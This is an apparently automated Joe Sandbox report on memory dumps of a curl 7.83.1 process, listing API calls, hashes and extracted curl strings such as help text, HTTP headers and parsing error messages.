                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_funcfree$_strdupfclosefopen
                                • String ID: <stdin>$Failed to read %s
                                • API String ID: 229151352-3349806160
                                • Opcode ID: 811a55666e648a50a57e1e133297979f539824fc7bd527b9024d8d73558bc75b
                                • Instruction ID: 0bdd953d0aa720af357e18d5e4f0eb04cc6cf7a61807869264b28ad04d8a5f6d
                                • Opcode Fuzzy Hash: 811a55666e648a50a57e1e133297979f539824fc7bd527b9024d8d73558bc75b
                                • Instruction Fuzzy Hash: 30319C7160CB429FC7519F349884AAABBE5FB9A354F150A5EF09AC7340EB3198058B82
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(curl/7.83.1), ref: 0086DAFA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdup
                                • String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
                                • API String ID: 1169197092-2108368468
                                • Opcode ID: 92beef4ef58bce2c6118f16227db3a8281890392f2d38bca0d99ffda07977ea3
                                • Instruction ID: 2fcf784361acfb6a2da03ab2f709c6da774dcba3d80287ce75cb90b75b4be9f9
                                • Opcode Fuzzy Hash: 92beef4ef58bce2c6118f16227db3a8281890392f2d38bca0d99ffda07977ea3
                                • Instruction Fuzzy Hash: C1210B31B087059FEB109AA99851B9BB7E5FF803A1F12443DE545D7286DF30DC0ACB11
                                APIs
                                • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Usage: curl [options...] <url>), ref: 008689A9
                                • puts.API-MS-WIN-CRT-STDIO-L1-1-0(This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".), ref: 008689C3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00868A13
                                Strings
                                • Invalid category provided, here is a list of all categories:, xrefs: 00868A01
                                • category, xrefs: 008689E6
                                • This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all"., xrefs: 008689BE
                                • Usage: curl [options...] <url>, xrefs: 008689A2
                                • all, xrefs: 008689CC
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: puts$free
                                • String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
                                • API String ID: 1067472072-287794235
                                • Opcode ID: f82ac18f6ba5f0c5093d8261d3b5a05606d0dfcf4050177f8e572d5f2006a03b
                                • Instruction ID: 088a64d9bc9916f6698d948c3e0b87a6339ae3b407c0ceceb8eddb52950cd95c
                                • Opcode Fuzzy Hash: f82ac18f6ba5f0c5093d8261d3b5a05606d0dfcf4050177f8e572d5f2006a03b
                                • Instruction Fuzzy Hash: 87F0E93120C625D79B6977782C1B6AE3604FE467A5B16432AF85BFB3C2EF58CC014257
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: %%25%s]$%25$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                                • API String ID: 0-326007067
                                • Opcode ID: 35a55b398273405438158eb239708d370f0080776a08e226f34f108d9512cc89
                                • Instruction ID: 29118ec1615449b926d44cb88cd286e252799074544ed85e2178caa3fbad0f80
                                • Opcode Fuzzy Hash: 35a55b398273405438158eb239708d370f0080776a08e226f34f108d9512cc89
                                • Instruction Fuzzy Hash: 71028E31A00A1ADBDB15CF68C854BAABBB1FF49714F14C069E909E7385E771DC64CBA0
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AA1B4
                                  • Part of subcall function 008AA4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AA4FB
                                  • Part of subcall function 008AA4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AA52C
                                  • Part of subcall function 008AA4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AA54E
                                  • Part of subcall function 008AA4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AA565
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AA211
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AA267
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AA426
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$calloc$malloc
                                • String ID: CompleteAuthToken failed: %s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)$SSPI: couldn't get auth info
                                • API String ID: 3103867982-170984166
                                • Opcode ID: fd3f7e71038d936dda3b5917ab87e229b297f5d5142a1865c17d6222226da24f
                                • Instruction ID: 48f3f429ee45b8961559754d4013b2e94eae5cde05c69e28c30d3bdcce5b07ce
                                • Opcode Fuzzy Hash: fd3f7e71038d936dda3b5917ab87e229b297f5d5142a1865c17d6222226da24f
                                • Instruction Fuzzy Hash: 88C11B71A01629AFEB24CF14DC54BD9B7B5FF49310F0081AAE909E7A50DB71AE94CF81
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087C0A8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087C0C1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087C19D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087C1B7
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,754C3C50,00000000,0088182F), ref: 0087F671
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F685
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F699
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6AD
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6C1
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6D5
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6E9
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F6FD
                                  • Part of subcall function 0087F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F70F
                                  • Part of subcall function 00880830: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088086B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$calloc
                                • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
                                • API String ID: 3095843317-3179978524
                                • Opcode ID: ec9ae2faa98e4fca49680b996d5bd255cd919d52fb75e13814bac1f84fdcdf6d
                                • Instruction ID: 6348bc9ff6e0b67e961f669e3641236a5375f1f2ec3a9d86578a77bb664b8bb0
                                • Opcode Fuzzy Hash: ec9ae2faa98e4fca49680b996d5bd255cd919d52fb75e13814bac1f84fdcdf6d
                                • Instruction Fuzzy Hash: C18180717046118BDB189F289891B2E73A6FB85B10F24C47DE84DDB29ADF74DC418B91
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00884488
                                • ___from_strstr_to_strchr.LIBCMT ref: 008844AE
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,0087A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00884544
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,0087A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 0088456A
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,0087A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00884590
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 008845AC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000), ref: 008845C1
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: malloc$___from_strstr_to_strchrfree
                                • String ID:
                                • API String ID: 402731313-0
                                • Opcode ID: fb2fb11b0c31255ca03f7e396e3a9ba2c270cc546313e0c2b5431e14a871b006
                                • Instruction ID: 4bff052e68b06ea9fe823a57fc28fa9e43a4961691d09ce5b67020e73a501697
                                • Opcode Fuzzy Hash: fb2fb11b0c31255ca03f7e396e3a9ba2c270cc546313e0c2b5431e14a871b006
                                • Instruction Fuzzy Hash: C4815B76E0062ADFDF14EFA8D8449AEBBB5FF49750B14816AE805E7351DB30AD008B94
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008638EC
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008638F4
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00863902
                                  • Part of subcall function 00861018: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,00863910), ref: 0086101E
                                  • Part of subcall function 00861018: _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,00863910), ref: 00861025
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00863911
                                • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00863919
                                • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 0086393E
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0086398D
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(008B74AB), ref: 008639B7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008639FD
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00863A3D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_func$_fileno_strdup$_fstat64_setmodefreeftell
                                • String ID:
                                • API String ID: 4154865980-0
                                • Opcode ID: 8aac6ff95d8049af9b69149912533d954e77d9ee3a4e41cba8941618c14b6c4d
                                • Instruction ID: 71b1817cc58800017fcbff30660c501a8c14e1808cd2bba6498ef0e52bc6e075
                                • Opcode Fuzzy Hash: 8aac6ff95d8049af9b69149912533d954e77d9ee3a4e41cba8941618c14b6c4d
                                • Instruction Fuzzy Hash: E0515C72D00B198BDB20DFA8C8857ADBBF5FF49721F25451AE445EB341DBB4AA418F40
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00875D8C,754C3C50,008816C0), ref: 008749E7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008749FB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A0F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A23
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A37
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A4B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A5F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A73
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A87
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874A9B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874AAF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874AC3
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 3bae10d6b0a8a80a4fb53c7b477cc5aa5e3ba79f8344c1acd370266afe07fd52
                                • Instruction ID: 2842f32afca691de245aa34d101d6415bff5079df011928dadfd45559e539c59
                                • Opcode Fuzzy Hash: 3bae10d6b0a8a80a4fb53c7b477cc5aa5e3ba79f8344c1acd370266afe07fd52
                                • Instruction Fuzzy Hash: 1D219436604929DB9B091F24FC0885CBFB6FF4D661329816AE90193772DFB62C118FD4
                                APIs
                                • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 008A078E
                                  • Part of subcall function 008A04E4: ___from_strstr_to_strchr.LIBCMT ref: 008A0503
                                Strings
                                • failed to resume file:// transfer, xrefs: 008A0A3D
                                • Accept-ranges: bytes, xrefs: 008A0820
                                • Can't get the size of file., xrefs: 008A09AF
                                • Content-Length: %I64d, xrefs: 008A0851
                                • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 008A0935
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr_fstat64
                                • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer
                                • API String ID: 1237401293-1509146019
                                • Opcode ID: 9971c0aee4a3c2d5eeabeac34fcc01fd654a873e067c61af159e023964b975c6
                                • Instruction ID: 2f0b6663634b8e00ff9567c243ff243c807d6b2b7b0803ef4e07db350e55b96d
                                • Opcode Fuzzy Hash: 9971c0aee4a3c2d5eeabeac34fcc01fd654a873e067c61af159e023964b975c6
                                • Instruction Fuzzy Hash: 3ED1A2716083419FFB24DE288851B6B77E5FF86314F18457DE889CB682EA70EC448F62
                                APIs
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(%25,00000001,00000003), ref: 00884B8D
                                • ___from_strstr_to_strchr.LIBCMT ref: 00884C01
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00884C1F
                                Strings
                                • Please URL encode %% as %%25, see RFC 6874., xrefs: 00884B9A
                                • Invalid IPv6 address format, xrefs: 00884BEF
                                • No valid port number in connect to host string (%s), xrefs: 00884C3E
                                • %25, xrefs: 00884B88
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrstrncmpstrtol
                                • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                • API String ID: 236576716-4202423297
                                • Opcode ID: d20e39f421a7c404aa043c8a70d9b3059755b65e997ed0e57d5b7bcf202ee6ed
                                • Instruction ID: a8a0e34fc81324392c46a04cc7ab28a4d7dd825fc8f3da293a5dbd4624a853eb
                                • Opcode Fuzzy Hash: d20e39f421a7c404aa043c8a70d9b3059755b65e997ed0e57d5b7bcf202ee6ed
                                • Instruction Fuzzy Hash: F251AB3690520BAFDB20AFA8D8417BD7BAAFF16324F24106AE880D7392D731CC44CB40
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088086B
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008808DD
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B7A20), ref: 008808F7
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0088093F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088096E
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00880992
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,0088126F), ref: 00880A02
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00880A14
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fclosefree$__acrt_iob_funccallocfopenmalloc
                                • String ID: Set-Cookie:
                                • API String ID: 3610089413-2427311273
                                • Opcode ID: 4f804f26e1e8730fb38748b0e6c7506fb9c35ae905f04ebda8a45412604d36bf
                                • Instruction ID: ca087ca6c11853c26f613508344472212978b2d28e0e016d03817680a020c665
                                • Opcode Fuzzy Hash: 4f804f26e1e8730fb38748b0e6c7506fb9c35ae905f04ebda8a45412604d36bf
                                • Instruction Fuzzy Hash: 474134317087119BEB656B289C4076E7BD5FB49B10F18402EF949D73C3CAB08D498BD2
                                APIs
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0( ,?,?,?,?,?,?,?,?,?), ref: 008614A3
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?,?,?,?,?,?,?), ref: 00861536
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 0086154F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fflushfputcfputs
                                • String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)$<= Recv header
                                • API String ID: 2904194729-208095841
                                • Opcode ID: 9020ef3032f0c9a52d78ef52661e403afe94cff11fba520beb38b8539e0f5620
                                • Instruction ID: 6aa95216a467409af76b90790f5415f0ef6a6ba28f307ae62afb3daecf2757a8
                                • Opcode Fuzzy Hash: 9020ef3032f0c9a52d78ef52661e403afe94cff11fba520beb38b8539e0f5620
                                • Instruction Fuzzy Hash: FA41E272A00258AFDF11CF18DC8AAADBBB2FF44314F194055FC1AE7242C671AE51CB94
                                APIs
                                • __aulldiv.LIBCMT ref: 0086E314
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0086E346
                                • __aulldiv.LIBCMT ref: 0086E39A
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0086E3CF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__aulldiv__ehfuncinfo$??2@
                                • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--
                                • API String ID: 1185945948-1858174321
                                • Opcode ID: 5c8dcb0df85e4d44c97f0f89f4e012b6b50564188bbd79bcef09663e11fc7902
                                • Instruction ID: 6df5f0e01d8e738171c63881c0d77f0db517729a14c6aec5450e9c911dc49781
                                • Opcode Fuzzy Hash: 5c8dcb0df85e4d44c97f0f89f4e012b6b50564188bbd79bcef09663e11fc7902
                                • Instruction Fuzzy Hash: AE31F775B00608BAEB25A67D8C47FAF797DFBC1B50F158024B904FB382E5B09E008665
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00867BFD
                                  • Part of subcall function 008709FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00870A07
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867C56
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867CB1
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00867CC1
                                Strings
                                • A specified range MUST include at least one dash (-). Appending one for you!, xrefs: 00867C26
                                • %I64d-, xrefs: 00867C40
                                • unsupported range point, xrefs: 00868216
                                • Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain., xrefs: 00867C99
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$___from_strstr_to_strchr_errno_strdup
                                • String ID: %I64d-$A specified range MUST include at least one dash (-). Appending one for you!$Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain.$unsupported range point
                                • API String ID: 4096323884-1864133270
                                • Opcode ID: eb099d56bd5af8c9f766054f6b1b2053df1fbdb188805766e2bca5716f9b3464
                                • Instruction ID: 2e248b2af86debf606f28728c6ee1703dcb04469b865bc688eb82c2fd64512f5
                                • Opcode Fuzzy Hash: eb099d56bd5af8c9f766054f6b1b2053df1fbdb188805766e2bca5716f9b3464
                                • Instruction Fuzzy Hash: 7C21D87120C301DEE6249B349C86BBB7BD9FF85304F21090EF596DA3C2DE75E8449656
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00863B75
